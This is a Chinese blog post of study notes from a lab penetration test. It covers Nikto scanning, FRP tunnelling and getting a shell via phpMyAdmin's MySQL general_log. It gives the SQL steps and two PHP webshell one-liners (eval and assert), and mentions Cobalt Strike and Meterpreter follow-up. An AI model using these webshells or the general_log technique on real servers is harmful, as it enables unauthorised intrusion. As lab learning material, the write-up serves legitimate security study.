学习实战文章_第一篇

提取文章概要

  第一次听说Nikto:用Nikto工具对192.168.2.244进行扫描发现有phpMyAdmin。

  内网穿透方式:FRP+Proxifier。
内网机器执行客户端:nohup ./frpc -c frpc.ini &
公网VPS执行服务端:nohup ./frps -c frps.ini &

  phpmyadmin默认账号密码root/root,利用general_log成功getshell。
(执行具体命令,见参考文章)

  注意:由于目标用的PHP7.0.12,可能会导致很多大马和一句话木马都用不了,或者在中国菜刀连接时会出现报错,因为PHP7移除了set_magic_quotes_runtime函数,而中国菜刀的数据包中又含有set_magic_quotes_runtime。(大马内容,见参考文章)

  机器可以访问外网,执行CS木马,便于后期对192.168.3.x网段测试。

  利用Meterpreter、配置proxychains进行后续内网渗透。



了解学习

网页扫描神器Nikto

  初步介绍
  Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。(GNU公共许可证,表示自由软件)
  Nikto是一个用来发现默认网页文件、检查网页服务器和CGI安全问题的工具。Perl语言开发,命令行工具。

  操作系统:Linux,FreeBSD,UNIX(Kali自带)
开发公司:开源。作者是Chris Sullo,是开放安全基金会的财务总监。
官方网站:https://cirt.net/

  初步利用
常规扫描:执行命令nikto -host/-h ip或域名,默认扫描80端口。
指定端口扫描:nikto -h ip或域名 -p 443
指定目录扫描:nikto -h ip或域名 -c /dvwa,使用-c all表示目录爆破并扫描
多目标扫描:nikto -host mylist.txt
输出扫描结果:nikto -host ip或域名 -o result.html -F htm/txt/csv/xml
使用代理扫描:nikto -h URL -useproxy http://127.0.0.1:1080
(当然,需要配合其他代理工具使用,比如proxychains)
软件更新:nikto -update。
组件默认密码:nikto官网还发布了各大组件的默认密码,可以访问https://cirt.net/passwords进行查看。


phpMyAdmin日志general_log拿shell

复现环境和利用情况

  使用墨者靶场复现:数据库mysql/5.0.1、数据库管理工具phpMyAdmin/4.8.1、编程语言PHP/5.6.39。

  使用默认账号口令root/root登录phpMyAdmin。
  利用genaral_log拿shell。前提:登录phpMyAdmin,知道绝对路径。需要root用户能够查看日志,最好是Windows操作系统。
  未成功原因:Linux操作系统下,root访问日志提示“access denied”。

具体过程:

  phpMyAdmin执行SQL语句:show GLOBAL VARIABLES like “%general%”;
  选择特定的数据库mysql。成功开启日志:set GLOBAL general_log=‘on’;
  查询数据库绝对路径:select @@basedir;
  指定日志存储文件:set global general_log_file=’/var/www/html/cmd.php’;
访问日志文件,是否能够查看,而不是“access denied”。
  通过查询注入木马语句:SELECT “<?php $z0=str_replace('@set_magic_quotes_runtime(0);','',base64_decode($_POST['z0']));$_POST['z0']=base64_encode($z0);@eval($_POST['cmd']);?>”;
  或写入一句话木马:select ‘<?php assert($_POST["v01cano"]); ?>’
  连接木马。关闭日志:set global general_log=‘off’

在这里插入图片描述

在这里插入图片描述

  对靶场进行目录扫描,没有发现phpinfo.php。
  查询数据库绝对路径:select @@basedir;
知道/usr,所以目标操作系统是Linux,猜测网站根目录是/var/www/html。

在这里插入图片描述

  注入木马:

在这里插入图片描述

  访问设置的文件,发现拒绝访问,使用蚁剑和菜刀无法连接:

在这里插入图片描述

  成功的案例中,root用户能够访问日志文件。Linux的访问控制针不戳。

在这里插入图片描述



参考

  《靶场攻略 | 某大学实战靶场记录》,2021-03
文章地址https://mp.weixin.qq.com/s/aZs_mXzGtxuLJGtdV6_6XQ

  《Nikto-百度百科》

  《Web漏洞扫描神器Nikto使用指南》,2020-04
文章地址https://zhuanlan.zhihu.com/p/124246499

  《漏洞扫描工具nikto使用心得》,2014-11
文章地址https://blog.csdn.net/mydriverc2/article/details/41365687

  《利用general_log来getshell》,2019-03
文章地址https://blog.csdn.net/Blue_Starry_sky/article/details/88119104

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值